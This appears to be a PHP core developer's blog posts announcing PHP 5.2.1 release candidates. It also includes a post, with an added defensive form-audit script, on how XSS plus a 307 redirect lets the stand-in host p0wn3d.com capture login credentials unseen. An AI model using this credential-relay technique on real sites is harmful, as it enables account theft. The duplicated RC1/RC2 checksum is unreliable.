The 3rd release candidate for PHP 5.2.1 is now available for download. The tarballs can be found here: http://downloads.php.net/ilia/php-5.2.1RC3.tar.bz2 (d3889eda8c3471ce7cf2adb35a4de736) http://downloads.php.net/ilia/php-5.2.1RC3.tar.gz (c5b3e5540d1951d4c4b976b8a39c09ab) and the Win32 binaries will be available in short order. Since the last release, there are over 20 different bug fixes resolving some annoying engine issues such as the tempval leak inside foreach(). We do not anticipate any regressions to be introduced by this RC, but I would still like to ask everyone to take a few minutes and test it against their code base. If you come across any issues please report them at http://bugs.php.net/. Depending on the stability of this release it may either be followed by a final release or another RC, therefore your feedback is critical to determining whether or not the code is stable enough to warrant the 5.2.1 final.

Thanks to Steph's hard work the last few months of weeklies are now available for reading. If you don't have the time to keep an eye on what's going on in the PHP community, especially on the developer mailing lists, weeklies are a quick shortcut to getting yourself up to date.

Every web developer knows how to make a GET redirect; in fact, they've probably done it numerous times. However, very few people know the same can be done for POST requests, in some instances completely transparently to the user. This by itself may not seem like an issue, but when you combine it with XSS it can be a very powerful tool used to scam users. Consider the following scenario. A user goes to a trusted site where XSS has modified the action field of the login POST form, pointing it to http://p0wn3d.com/post.php. When the user submits a request it goes to a 3rd party site, which captures the login credentials and then redirects the POST data to the original site. In the end the user has no clue something sinister has happened because they never see p0wn3d.com. In fact, everything appears to have worked as intended. So how does this work? The ability to redirect POST comes courtesy of the little-known 307 redirect code, which in PHP can be forced in the following manner: [php] header("Location:...
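A defender can catch the tampered form described above by auditing rendered pages for POST forms whose action resolves outside the site's own origins. The following is an added example, not code from the original post; `TRUSTED_ORIGINS`, `auditForms`, `bank.example` and the sample markup are assumptions constructed for illustration, and the regex-based tag matching is a simplification of real HTML parsing.

```javascript
// Added example: flag POST forms that send data off the trusted origins.
// TRUSTED_ORIGINS and PAGE_URL are constructed values for illustration.
const TRUSTED_ORIGINS = new Set(["https://bank.example"]);
const PAGE_URL = "https://bank.example/account/login";

// Read one quoted attribute from an opening tag (simplified: quoted values only).
function attr(tag, name) {
  const re = new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)')`, "i");
  const m = re.exec(tag);
  return m ? (m[1] !== undefined ? m[1] : m[2]) : null;
}

// Return a finding for every POST form whose resolved action leaves TRUSTED_ORIGINS.
function auditForms(html, pageUrl) {
  const findings = [];
  const formRe = /<form\b[^>]*>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const openTag = m[0].slice(0, m[0].indexOf(">") + 1);
    const method = (attr(openTag, "method") || "get").toLowerCase();
    if (method !== "post") continue;
    const action = attr(openTag, "action") || ""; // empty action posts to the page itself
    let target;
    try {
      target = new URL(action, pageUrl); // resolves relative actions like a browser
    } catch {
      findings.push({ action, hasPassword: false, reason: "unparseable action" });
      continue;
    }
    if (!TRUSTED_ORIGINS.has(target.origin)) {
      const hasPassword = /<input\b[^>]*type\s*=\s*["']?password/i.test(m[1]);
      findings.push({ action: target.href, hasPassword, reason: "POST leaves trusted origins" });
    }
  }
  return findings;
}

// Constructed sample: the first form's action was rewritten as in the scenario above.
const SAMPLE_HTML = `
<form method="post" action="http://p0wn3d.com/post.php">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
<form method="POST" action="/profile/update"><input type="text" name="email"></form>`;

console.log(auditForms(SAMPLE_HTML, PAGE_URL));
```

Because the 307 hop replays the POST to the original site, the user-visible flow looks normal; checking the form's resolved action before submission is what exposes the detour.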

The 2nd release candidate for PHP 5.2.1 is now available for download. The tarballs can be found here: http://downloads.php.net/ilia/php-5.2.1RC2.tar.bz2 (cc6024531e3d4058e32cf740e2fe535f) http://downloads.php.net/ilia/php-5.2.1RC2.tar.gz (3f89c31687762a39f1360b380dd315b4) Since the last release over 30 different bug fixes were made and the two pending patches relating to is_numeric_string() optimization and internal heap protection for the Zend Engine allocator were added. Another important change was the fact that the memory limit is now always enabled and to accommodate this change the default limit value was raised to 128 megabytes to avoid script breakage. We do not anticipate any regressions to be introduced by this RC, but I would still like to ask everyone to take a few minutes and test it against their code base. If you come across any issues report them via http://bugs.php.net/ or reply to this blog post.

The first release candidate of PHP 5.2.1 scheduled for late January is now available for download. The tarballs can be found here: php-5.2.1RC1.tar.bz2 (md5sum: cc6024531e3d4058e32cf740e2fe535f) php-5.2.1RC1.tar.gz (md5sum: bafcdff32bcaa564f65293c1c42d117e) For win32 users binaries are available courtesy of Edin php-5.2.1RC1-Win32.zip (md5sum: 00d6833308931fa58581574b8d364e12) php-debug-pack-5.2.1RC1-Win32.zip (md5sum: ac86975945193455658d85921d835e60) This release is primarily aimed at improving the stability of the language and finalization of features introduced in 5.2.0. There are over 70 different bug fixes, a great deal of performance improvements for Windows users, corrections to the memory manager and the improvement in the filter functionality. I'd like to ask everyone to try this release out and let us know if you come across any issues and/or regressions.